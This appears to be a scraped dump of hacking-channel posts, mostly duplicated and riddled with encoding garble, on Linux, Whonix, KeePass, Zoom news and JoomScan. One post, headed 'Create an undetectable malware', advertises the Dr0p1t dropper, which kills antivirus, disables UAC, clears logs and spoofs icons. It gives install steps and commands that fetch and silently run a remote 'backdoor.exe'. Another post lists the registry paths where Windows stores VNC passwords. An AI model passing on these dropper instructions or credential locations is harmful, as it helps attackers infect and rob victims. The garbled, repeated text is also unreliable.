β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦some missed tips in linux :
#FastTips
1) Unsuccessful distribution base
The basis is taken Xubuntu, that is, in fact, Ubuntu. If you installed the latest versions of Ubuntu, you might have noticed how many shortcuts there are for different cloud services that most do not need. It seems that this is Windows, which runs a virus that has installed a couple of dozen shortcuts.
> It got to the point that Linux Mint (based on Ubuntu) BLOCKS the Snap installation (developed by Canonical Ltd.), which behaves like a real trojan - it installs hidden, overwrites part of the packages secretly, and secretly connects to remote servers. This was said last year ( https://blog.linuxmint.com/?p=3766 ) and was repeated again in this ( https://blog.linuxmint.com/?p=3906 ).
> My personal use of Ubuntu evoked only negative emotions. Constantly occurring errors and the proposal to send a report - I already had a similar OS, it was called Windows '98.
2) Unsuccessful tuning of the desktop environment
The distribution uses XFCE, but it is made to look like GNOME 3. Result: it is almost impossible to find and open a minimized application. In general, the feeling of the desktop: "Ponte is more expensive than usability."
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦some missed tips in linux :
#FastTips
1) Unsuccessful distribution base
The basis is taken Xubuntu, that is, in fact, Ubuntu. If you installed the latest versions of Ubuntu, you might have noticed how many shortcuts there are for different cloud services that most do not need. It seems that this is Windows, which runs a virus that has installed a couple of dozen shortcuts.
> It got to the point that Linux Mint (based on Ubuntu) BLOCKS the Snap installation (developed by Canonical Ltd.), which behaves like a real trojan - it installs hidden, overwrites part of the packages secretly, and secretly connects to remote servers. This was said last year ( https://blog.linuxmint.com/?p=3766 ) and was repeated again in this ( https://blog.linuxmint.com/?p=3906 ).
> My personal use of Ubuntu evoked only negative emotions. Constantly occurring errors and the proposal to send a report - I already had a similar OS, it was called Windows '98.
2) Unsuccessful tuning of the desktop environment
The distribution uses XFCE, but it is made to look like GNOME 3. Result: it is almost impossible to find and open a minimized application. In general, the feeling of the desktop: "Ponte is more expensive than usability."
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create an undetectable malware :
Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
π¦FEATURES :
The executable size is smaller compared to other droppers generated the same way.
Download executable on target system and execute it silently..
Self destruct function so that the dropper will kill and delete itself after finishing it work
Escape disk forensics by making all the files dropper create and
dropper also cleans its content before deletion
Clear event log after finishing.
Works with Windows, Linux and now have OSX support
Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server
Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server
Find and kill antivirus before running the malware.
The ability to disable UAC.
The ability to run your malware as admin.
Full spoof by spoofing the file icon and extension to any thing you want.
ZIP files support so now you can compress your executable to zip file before uploading.
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create an undetectable malware :
Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
π¦FEATURES :
The executable size is smaller compared to other droppers generated the same way.
Download executable on target system and execute it silently..
Self destruct function so that the dropper will kill and delete itself after finishing it work
Escape disk forensics by making all the files dropper create and
dropper also cleans its content before deletion
Clear event log after finishing.
Works with Windows, Linux and now have OSX support
Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server
Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server
Find and kill antivirus before running the malware.
The ability to disable UAC.
The ability to run your malware as admin.
Full spoof by spoofing the file icon and extension to any thing you want.
ZIP files support so now you can compress your executable to zip file before uploading.
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/D4Vinci/Dr0p1t-Framework.git7οΈβ£Examples :
2οΈβ£chmod 777 -R Dr0p1t-Framework
3οΈβ£cd Dr0p1t-Framework
4οΈβ£sudo chmod +x install.sh
5οΈβ£./install.sh
6οΈβ£python Dr0p1t.py
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Whonix :
Whonix is a Linux-based operating system focused on anonymity and security. It is designed to hide the user's IP address / location and uses the Tor network to anonymize data traffic. This means that the server being accessed and the Tor network operators cannot easily determine which sites are being visited or the user's physical location.
Whonix is a Linux-based operating system focused on anonymity and security. It is designed to hide the user's IP address / location and uses the Tor network to anonymize data traffic. This means that the server being accessed and the Tor network operators cannot easily determine which sites are being visited or the user's physical location.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ What to choose: Whonix, Tails, Tor Browser ... :
1οΈβ£Whonix is not the only operating system for anonymity. Another analog is Tails . Like Whonix , Tails also uses Tor , so the question may be: is Tor better than the Tor browser ?
2οΈβ£ Choosing a tool for anonymity is more dependent on your needs.
3οΈβ£Tor browser will be enough if you want to bypass site blocking or want to hide your IP address in non-critical situations.
4οΈβ£The Tails operating system is designed for situations where it is not only critical to maintain anonymity, but also in the case of physical seizure of a computer, making it impossible to collect evidence. For this, for example, in Tails, it is impossible to save files other than on specially created encrypted storage. Program and operating system settings, as well as the history of any activity, are also not saved by default. To enable this, you need to read the instructions - safely, but not conveniently. In practice, many users do not need such measures. See also the Tails Guide
5οΈβ£Whonix focuses on ensuring anonymity - in fact, Whonix is broken down into 2 operating systems. One of them is a gateway through which Internet access is performed. And the second is a workstation. Thanks to this approach, even if the workstation is hacked and the attacker has a superuser password from it, it will be impossible to find out the user's IP address. This is achieved by the fact that the Whonix workstation in the properties of the virtual machine is configured to access the Internet only through the gateway - these settings cannot be changed from the virtual machine. Therefore, even if a hacker can change the settings inside Whonix, the maximum that he can achieve is to spoil the settings and make it impossible to access the Internet, but not to compromise IP.
6οΈβ£At the same time, you can work and save files in Whonix as in any ordinary operating system. That is, Whonix is aimed at anonymity, but not at counteracting the collection of electronic evidence.
π¦What version of Whonix to download
> To run Whonix, you need a free program for working with virtual machines - VirtualBox .
> To broaden your horizons , the VirtualBox Manual is recommended. At a minimum, read about installing this program on your operating system:
1) Install VirtualBox on Windows/Linux
2) Go to the Whonix download page on the official website: https://www.whonix.org/wiki/Download
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ What to choose: Whonix, Tails, Tor Browser ... :
1οΈβ£Whonix is not the only operating system for anonymity. Another analog is Tails . Like Whonix , Tails also uses Tor , so the question may be: is Tor better than the Tor browser ?
2οΈβ£ Choosing a tool for anonymity is more dependent on your needs.
3οΈβ£Tor browser will be enough if you want to bypass site blocking or want to hide your IP address in non-critical situations.
4οΈβ£The Tails operating system is designed for situations where it is not only critical to maintain anonymity, but also in the case of physical seizure of a computer, making it impossible to collect evidence. For this, for example, in Tails, it is impossible to save files other than on specially created encrypted storage. Program and operating system settings, as well as the history of any activity, are also not saved by default. To enable this, you need to read the instructions - safely, but not conveniently. In practice, many users do not need such measures. See also the Tails Guide
5οΈβ£Whonix focuses on ensuring anonymity - in fact, Whonix is broken down into 2 operating systems. One of them is a gateway through which Internet access is performed. And the second is a workstation. Thanks to this approach, even if the workstation is hacked and the attacker has a superuser password from it, it will be impossible to find out the user's IP address. This is achieved by the fact that the Whonix workstation in the properties of the virtual machine is configured to access the Internet only through the gateway - these settings cannot be changed from the virtual machine. Therefore, even if a hacker can change the settings inside Whonix, the maximum that he can achieve is to spoil the settings and make it impossible to access the Internet, but not to compromise IP.
6οΈβ£At the same time, you can work and save files in Whonix as in any ordinary operating system. That is, Whonix is aimed at anonymity, but not at counteracting the collection of electronic evidence.
π¦What version of Whonix to download
> To run Whonix, you need a free program for working with virtual machines - VirtualBox .
> To broaden your horizons , the VirtualBox Manual is recommended. At a minimum, read about installing this program on your operating system:
1) Install VirtualBox on Windows/Linux
2) Go to the Whonix download page on the official website: https://www.whonix.org/wiki/Download
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Whonix
Download Whonix (FREE)
FREE Download Whonix. Privacy Protection. Anonymity Online. For Windows, macOS, Linux.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Which password manager to choose. What is better KeePass, KeePassX or KeePassXC
> There are many password managers. It is worth choosing the one with the source code open (which allows you to make sure that your passwords will not be sent to the attacker and / or there are no bookmarks in the encryption algorithm).
> One of the popular, well-established is KeePass . Initially, this program was written for Windows, but with Mono (an open implementation of the .NET platform, including a working environment and a compiler), it also works on Linux, Mac OS X.
KeePass has two popular branches:
1) KeePassX is a cross-platform program, with a branch there were some advantages over KeePass, now development has slowed down
2) KeePassXC - another cross-platform fork, also had some advantages, but at present it functions the same as KeePass. Small advantages - the Russian language is already built-in and does not require additional installation (as needed in KeePass). Also, the program is initially cross-platform and looks the same in any operating system. While KeePass looks a little different, due to the fact that different platforms use the original .NET environment or its open analogue Mono
> All three of these programs have mutually compatible databases.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£wget
2οΈβ£unzip KeePass - * - Russian.zip
3οΈβ£rm KeePass - * - Russian.zip
4οΈβ£sudo mkdir / usr / share / keepass / Languages
5οΈβ£sudo mv Russian.lngx / usr / share / keepass / Languages
keepass
6οΈβ£How to create a KeePass database
> The principle of the password manager is that all data (logins and passwords) is encrypted and stored in one database. You can select any name and any location of the database file. It is recommended that you back it up regularly.
> Databases can be any number.
7οΈβ£To transfer all encrypted passwords to another computer, just copy the database file (everything is stored in one file).
As you can see, most of the functions in the interface are inactive, until the database is created, click the " Create " icon :
π¦for windows To download KeePass, go to the official website: https://keepass.info/download.html
enjoy
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Which password manager to choose. What is better KeePass, KeePassX or KeePassXC
> There are many password managers. It is worth choosing the one with the source code open (which allows you to make sure that your passwords will not be sent to the attacker and / or there are no bookmarks in the encryption algorithm).
> One of the popular, well-established is KeePass . Initially, this program was written for Windows, but with Mono (an open implementation of the .NET platform, including a working environment and a compiler), it also works on Linux, Mac OS X.
KeePass has two popular branches:
1) KeePassX is a cross-platform program, with a branch there were some advantages over KeePass, now development has slowed down
2) KeePassXC - another cross-platform fork, also had some advantages, but at present it functions the same as KeePass. Small advantages - the Russian language is already built-in and does not require additional installation (as needed in KeePass). Also, the program is initially cross-platform and looks the same in any operating system. While KeePass looks a little different, due to the fact that different platforms use the original .NET environment or its open analogue Mono
> All three of these programs have mutually compatible databases.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£wget
curl -s https://keepass.info/translations.html | grep -o -E 'https://downloads.sourceforge.net/keepass/KeePass[0-9.-β +Russian.zip' | tail -n 1
(avaible also in english)2οΈβ£unzip KeePass - * - Russian.zip
3οΈβ£rm KeePass - * - Russian.zip
4οΈβ£sudo mkdir / usr / share / keepass / Languages
5οΈβ£sudo mv Russian.lngx / usr / share / keepass / Languages
keepass
6οΈβ£How to create a KeePass database
> The principle of the password manager is that all data (logins and passwords) is encrypted and stored in one database. You can select any name and any location of the database file. It is recommended that you back it up regularly.
> Databases can be any number.
7οΈβ£To transfer all encrypted passwords to another computer, just copy the database file (everything is stored in one file).
As you can see, most of the functions in the interface are inactive, until the database is created, click the " Create " icon :
π¦for windows To download KeePass, go to the official website: https://keepass.info/download.html
enjoy
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
keepass.info
Downloads - KeePass
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AGAIN Zoom reveals a remote code execution vulnerability that only affects Windows 7 and below
#NEWS
> Security researchers discovered a remote code execution vulnerability in the Windows Zoom client. From the current perspective, only systems with Windows 7 installed will be truly exposed to risks. Before Zoom actually solved the vulnerability, security company 0patch first released a micro-patch for the vulnerability. The company explained that the vulnerability is high in risk, and the remote attacker only needs to persuade the user to perform a simple action, such as opening One file can exploit this vulnerability.
> Once the malicious file is loaded, the attacker can launch an RCE attack without any warning displayed on the victim's computer. Although the vulnerability exists in all Windows versions of the Zoom client, only Windows 7 computers will be threatened.
"This vulnerability can only be exploited on Windows 7 and earlier versions of Windows. It is likely to be exploited on Windows Server 2008 R2 and earlier versions, although we have not tested it; but no matter which system, our micro-patch Will protect you, no matter where you use the Zoom Client," 0patch pointed out.
Subsequently, Zoom fixed this bug in version 5.1.3 of its Windows client. Users who previously installed the micropatches released by 0patch do not need to do anything when applying the official repair version of Zoom, because the micropatches themselves will automatically fail.
> This vulnerability shows how important it is to always run a supported version of Windows. Official support for Windows 7 ended in January this year, which means that this operating system from 2009 can no longer obtain any new updates and security patches from Microsoft . Additional fixes are shipped through customized security updates (available for a fee) or using third-party products such as 0patch.
#NEWS @UNDERCODENEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AGAIN Zoom reveals a remote code execution vulnerability that only affects Windows 7 and below
#NEWS
> Security researchers discovered a remote code execution vulnerability in the Windows Zoom client. From the current perspective, only systems with Windows 7 installed will be truly exposed to risks. Before Zoom actually solved the vulnerability, security company 0patch first released a micro-patch for the vulnerability. The company explained that the vulnerability is high in risk, and the remote attacker only needs to persuade the user to perform a simple action, such as opening One file can exploit this vulnerability.
> Once the malicious file is loaded, the attacker can launch an RCE attack without any warning displayed on the victim's computer. Although the vulnerability exists in all Windows versions of the Zoom client, only Windows 7 computers will be threatened.
"This vulnerability can only be exploited on Windows 7 and earlier versions of Windows. It is likely to be exploited on Windows Server 2008 R2 and earlier versions, although we have not tested it; but no matter which system, our micro-patch Will protect you, no matter where you use the Zoom Client," 0patch pointed out.
Subsequently, Zoom fixed this bug in version 5.1.3 of its Windows client. Users who previously installed the micropatches released by 0patch do not need to do anything when applying the official repair version of Zoom, because the micropatches themselves will automatically fail.
> This vulnerability shows how important it is to always run a supported version of Windows. Official support for Windows 7 ended in January this year, which means that this operating system from 2009 can no longer obtain any new updates and security patches from Microsoft . Additional fixes are shipped through customized security updates (available for a fee) or using third-party products such as 0patch.
#NEWS @UNDERCODENEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Do I need to obfuscate JavaScript ?
#FastTips
> JavaScript code works in web browsers of users and is available to them for study and other actions. If you asked yourself the question βWhy should I obfuscate my JavaScript code?β, There are many reasons why it is recommended to protect the code, for example:
1) Do not let anyone just copy / paste your work. This is especially important for 100% client projects such as HTML5 games;
2) Removing comments and spaces that are not needed. Faster downloads and increased difficulty to understand;
3) Protection of works that have not yet been paid. You can show your work to the client, knowing that he will not have the source code until the bill is paid;
4) Protection against site proxies, proxy programs can change all internal links, thanks to obfuscation JavaScript can be protected from automatic parsers.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Do I need to obfuscate JavaScript ?
#FastTips
> JavaScript code works in web browsers of users and is available to them for study and other actions. If you asked yourself the question βWhy should I obfuscate my JavaScript code?β, There are many reasons why it is recommended to protect the code, for example:
1) Do not let anyone just copy / paste your work. This is especially important for 100% client projects such as HTML5 games;
2) Removing comments and spaces that are not needed. Faster downloads and increased difficulty to understand;
3) Protection of works that have not yet been paid. You can show your work to the client, knowing that he will not have the source code until the bill is paid;
4) Protection against site proxies, proxy programs can change all internal links, thanks to obfuscation JavaScript can be protected from automatic parsers.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦JOMLA WEB-HACKING :
OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system. Furthermore, OWASP JoomScan provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads.
OWASP JoomScan is included in Kali Linux distributions.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
# Build the docker image
docker build -t rezasp/joomscan .
# Run a new docker container with reports directory mounted at the host
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli rezasp/joomscan
5οΈβ£ For accessing the docker container you can run the following command
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli --entrypoint /bin/bash rezasp/joomscan
6οΈβ£Do default checks...
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com
7οΈβ£Enumerate installed components...
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com --ec
Set cookie
perl joomscan.pl --url www.example.com --cookie "test=demo;"
Set user-agent
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
or
π¦FEATURES :
Automated ...
*Version enumerator
*Vulnerability enumerator (based on version)
*Components enumerator (1209 most popular by default)
*Components vulnerability enumerator (based on version)(+1030 exploit)
*Firewall detector
*Reporting to Text & HTML output
*Finding common log files
*Finding common backup files
enjoyβ€οΈππ»
β Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦JOMLA WEB-HACKING :
OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments. Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known offensive vulnerabilities, but also is able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system. Furthermore, OWASP JoomScan provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads.
OWASP JoomScan is included in Kali Linux distributions.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/rezasp/joomscan.git4οΈβ£ For Docker installation and usage
2οΈβ£cd joomscan
3οΈβ£perl joomscan.pl
# Build the docker image
docker build -t rezasp/joomscan .
# Run a new docker container with reports directory mounted at the host
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli rezasp/joomscan
5οΈβ£ For accessing the docker container you can run the following command
docker run -it -v /path/to/reports:/home/joomscan/reports --name joomscan_cli --entrypoint /bin/bash rezasp/joomscan
6οΈβ£Do default checks...
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com
7οΈβ£Enumerate installed components...
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com --ec
Set cookie
perl joomscan.pl --url www.example.com --cookie "test=demo;"
Set user-agent
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
or
π¦FEATURES :
Automated ...
*Version enumerator
*Vulnerability enumerator (based on version)
*Components enumerator (1209 most popular by default)
*Components vulnerability enumerator (based on version)(+1030 exploit)
*Firewall detector
*Reporting to Text & HTML output
*Finding common log files
*Finding common backup files
enjoyβ€οΈππ»
β Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HACKING PROGRAMMING LANGUAGES:
#ForBeginers
1. Python
Python is one of the more commonly used programming languages ββfor developers. Many large enterprises choose Python for product development, such as: NASA, Google, Instagram, Spotify, Uber, Netflix, etc., and it is very wonderful that both beginners and professionals like Python, so it can be seen Popularity. If you are a technical professional in the big data profession, then Python is arguably the most suitable.
2. R
R is a language that can be easily connected to a database management system (DBMS), but in fact it does not provide any spreadsheet data view. However, the larger feature of R language is that it provides a variety of graphical functions for data representation, such as bar charts, pie charts, time series, point charts, 3D surfaces, image charts, maps, scatter charts, and so on. The R language can help users easily customize graphics and develop novel graphics with characteristics.
3. Java
After Java appeared, it was widely known for its versatility in data science and technology. Moreover, the open source framework Hadoop HDFS for processing and storing big data applications has been written entirely in Java. Java is also widely used to build various ETL applications, such as Apache, Apache Kafka, and Apache Camel. These applications are used to run data extraction, data conversion, and loading in a big data environment.
4. Scala
Scala is an open source high-level programming language, currently mainly used in the financial industry. A relatively large feature of Scala is its importance in ensuring the availability of big data. In short, Apache Spark is a cluster computing framework for big data applications. Big data practitioners generally need to have extensive knowledge and operational experience related to Scala.
5. Kotlin
Kotlin is a very good Android application development language that can run on the JVM. To some extent, it overcomes some of the shortcomings of Java and provides many modern functions. The main feature of Kotlin is its language design, which provides excellent pointers, security, type inference and other functions. The huge ecosystem of existing Java libraries is available for Kotlin, because Kotlin also runs in the JVM.
6. Go
The Go programming language has great concurrency support. Go uses "Goroutine" (lightweight green thread) and "Channel" for messaging. It does not provide "shared memory" concurrency through threads and locks, because in this case, programming will be more difficult. But it provides CSP-based messaging concurrency.
Go's favorite feature is simplicity. Novice developers can use it to write efficient code in just a few days, which is actually very similar to Python. Moreover, some large-scale cloud-native projects are also written in Go.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST HACKING PROGRAMMING LANGUAGES:
#ForBeginers
1. Python
Python is one of the more commonly used programming languages ββfor developers. Many large enterprises choose Python for product development, such as: NASA, Google, Instagram, Spotify, Uber, Netflix, etc., and it is very wonderful that both beginners and professionals like Python, so it can be seen Popularity. If you are a technical professional in the big data profession, then Python is arguably the most suitable.
2. R
R is a language that can be easily connected to a database management system (DBMS), but in fact it does not provide any spreadsheet data view. However, the larger feature of R language is that it provides a variety of graphical functions for data representation, such as bar charts, pie charts, time series, point charts, 3D surfaces, image charts, maps, scatter charts, and so on. The R language can help users easily customize graphics and develop novel graphics with characteristics.
3. Java
After Java appeared, it was widely known for its versatility in data science and technology. Moreover, the open source framework Hadoop HDFS for processing and storing big data applications has been written entirely in Java. Java is also widely used to build various ETL applications, such as Apache, Apache Kafka, and Apache Camel. These applications are used to run data extraction, data conversion, and loading in a big data environment.
4. Scala
Scala is an open source high-level programming language, currently mainly used in the financial industry. A relatively large feature of Scala is its importance in ensuring the availability of big data. In short, Apache Spark is a cluster computing framework for big data applications. Big data practitioners generally need to have extensive knowledge and operational experience related to Scala.
5. Kotlin
Kotlin is a very good Android application development language that can run on the JVM. To some extent, it overcomes some of the shortcomings of Java and provides many modern functions. The main feature of Kotlin is its language design, which provides excellent pointers, security, type inference and other functions. The huge ecosystem of existing Java libraries is available for Kotlin, because Kotlin also runs in the JVM.
6. Go
The Go programming language has great concurrency support. Go uses "Goroutine" (lightweight green thread) and "Channel" for messaging. It does not provide "shared memory" concurrency through threads and locks, because in this case, programming will be more difficult. But it provides CSP-based messaging concurrency.
Go's favorite feature is simplicity. Novice developers can use it to write efficient code in just a few days, which is actually very similar to Python. Moreover, some large-scale cloud-native projects are also written in Go.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Warning : all windows 10 users Special 2019 version and lower;
should update their Systems β
Xp3 the old system sometimes more secure than Win 10 2019π
should update their Systems β
Xp3 the old system sometimes more secure than Win 10 2019π
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Where Windows Store VNC Passwords ?
#fastTips
VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TigerVNC \ WinVNC4
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TightVNC \ Server
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ ORL \ WinVNC3 \ Default
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \
\ HKEY_CURRENT_USER \ Software \ TightVNC
\ HKEY_CURRENT_USER \ Software \ TurboVNC
\ HKEY_CURRENT_USER \ Software \ ORL \ WinVNC3 \ Password
\ HKEY_USERS \ .DEFAULT \ Software \ ORL \ WinVNC3 \ Password
> The password is stored in binary form, its length is 8 bytes.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Where Windows Store VNC Passwords ?
#fastTips
VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TigerVNC \ WinVNC4
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TightVNC \ Server
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ ORL \ WinVNC3 \ Default
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \
\ HKEY_CURRENT_USER \ Software \ TightVNC
\ HKEY_CURRENT_USER \ Software \ TurboVNC
\ HKEY_CURRENT_USER \ Software \ ORL \ WinVNC3 \ Password
\ HKEY_USERS \ .DEFAULT \ Software \ ORL \ WinVNC3 \ Password
> The password is stored in binary form, its length is 8 bytes.
β β β Uππ»βΊπ«Δπ¬πβ β β β